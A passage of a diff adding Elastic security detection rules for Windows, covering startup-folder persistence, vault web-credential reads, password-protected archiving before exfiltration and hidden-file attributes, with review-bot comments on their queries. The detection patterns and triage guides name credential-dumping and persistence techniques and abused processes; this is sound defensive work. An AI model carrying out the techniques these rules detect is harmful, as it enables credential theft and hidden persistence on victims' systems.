+ ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "440e2db4-bc7f-4c96-a068-65b78da59bde_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json new file mode 100644 index 00000000000..f9f3c588a16 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_110.json 
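Review bot: The `file.path` patterns in the `query` field are anchored to the `C:` drive, while the sibling rule `45d273fb` later in this diff already uses the `?:\\\\` drive wildcard for its paths, so a user profile or ProgramData directory on another drive letter will not match this rule. Consider `"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*"` and the equivalent for ProgramData, or state the `C:` assumption in the `note` so analysts know the coverage gap. The process list is matched on `process.name` alone, which depends on the on-disk file name; pairing it with `?process.pe.original_file_name` as the `45d273fb` query does would make the match more robust, if those fields are populated by the listed sources. The `_110` copy in the next hunk differs only in the index pattern (`logs-endpoint.events.file-*`) and the version, so both points apply there unchanged and are raised once here.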
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Startup Persistence by a Suspicious Process", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "## Setup\n\nIf enabling an EQL rule 
on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "440e2db4-bc7f-4c96-a068-65b78da59bde_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json new file mode 100644 index 00000000000..08eb2705e46 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Vault Web Credentials Read", + "query": "sequence by winlog.computer_name, winlog.process.pid with maxspan=1s\n\n /* 2 consecutive vault reads from same pid for web creds */\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and \n not winlog.event_data.Resource : \"http://localhost/\"]\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and \n not winlog.event_data.Resource : \"http://localhost/\"]\n", + "references": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=5382", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SchemaFriendlyName", + "type": 
"unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json new file mode 100644 index 00000000000..af27c248616 --- /dev/null 
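Review bot: The `setup` text instructs users to populate `event.ingested` for this EQL rule, but the rule object carries no `timestamp_override` field, unlike the other rule files in this diff which set `"timestamp_override": "event.ingested"`; as written the setup instruction has no effect on how this sequence is evaluated. If the omission is intentional for a sequence over Windows event-log data the setup text should say so, otherwise add `"timestamp_override": "event.ingested",` before the `"type": "eql"` entry. Separately, `winlog.event_data.Resource` and `winlog.event_data.SchemaFriendlyName` are listed with `"type": "unknown"` in `required_fields` while the query applies wildcard matches such as `"http*"` to them; confirming the mapped type would make the required-fields block reliable for consumers that validate mappings against it.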
+++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_110.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encrypting Files with WinRar or 7z", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. 
Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n process.name:\"rar.exe\" or ?process.code_signature.subject_name == \"win.rar GmbH\" or\n ?process.pe.original_file_name == \"Command line RAR\"\n ) and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"/hp*\", \"/p*\")\n ) or\n (\n ?process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : \"-p*\"\n )\n) and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ManageEngine\\\\*\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Nox\\\\bin\\\\Nox.exe\"\n )\n", + "references": [ + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + 
"version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + 
], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "45d273fb-1dca-457d-9855-bcb302180c21_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json new file mode 100644 index 00000000000..e52980e2cc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_111.json 
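Review bot: The query deliberately matches `-p*`/`-hp*` arguments, so every alert produced by this rule carries the archive password in `process.args` and `process.command_line`, and the investigation guide in `note` relies on that; the guide should state that alert documents for this rule contain a secret and that access to and retention of the alert index should be handled accordingly. The false-positive section also does not mention the `not process.parent.executable : ("C:\\\\Program Files\\\\*.exe", "C:\\\\Program Files (x86)\\\\*.exe")` exclusion, which suppresses the detection for any parent under those directories; a sentence such as `- Processes launched by applications installed under Program Files are excluded; review this exclusion if archiving activity from that location is unexpected in your environment.` would make the tuning visible to analysts. The `_111` copy in the next hunk shares both points and is cut off at the end of this view.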
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encrypting Files with WinRar or 7z", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. 
Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n process.name:\"rar.exe\" or ?process.code_signature.subject_name == \"win.rar GmbH\" or\n ?process.pe.original_file_name == \"Command line RAR\"\n ) and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"/hp*\", \"/p*\")\n ) or\n (\n ?process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : \"-p*\"\n )\n) and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ManageEngine\\\\*\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Nox\\\\bin\\\\Nox.exe\"\n )\n", + "references": [ + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + 
"version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + 
], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "45d273fb-1dca-457d-9855-bcb302180c21_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json new file mode 100644 index 00000000000..c3b4d2a2626 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adding Hidden File Attribute via Attrib", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or ?process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not (process.parent.name: \"cmd.exe\" and process.command_line: \"attrib +R +H +S +A *.cui\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": 
